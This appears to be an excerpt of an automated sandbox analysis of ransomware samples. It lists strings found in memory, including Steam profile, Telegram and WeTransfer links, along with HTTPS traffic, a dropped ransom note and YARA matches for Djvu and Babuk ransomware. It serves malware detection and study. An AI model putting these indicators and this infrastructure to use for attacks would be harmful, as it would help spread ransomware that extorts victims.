Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=ZVlkBFZXqRp1&l=e
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: UXNob1Dp32.exe, 00000005.00000003.1737013197.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000009.00000002.1935491088.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/9
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888A
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.000000000075E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000798000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000755000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.59.200.146:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49755 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

1_2_004822E0

Drops certificate files (DER)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 3260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UXNob1Dp32.exe PID: 7220, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UXNob1Dp32.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UXNob1Dp32.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.UXNob1Dp32.exe.5de15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UXNob1Dp32.exe.5e515a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.UXNob1Dp32.exe.5e515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UXNob1Dp32.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.UXNob1Dp32.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UXNob1Dp32.exe.5e315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.UXNob1Dp32.exe.5dc15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1815436829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2077605846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1804523922.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
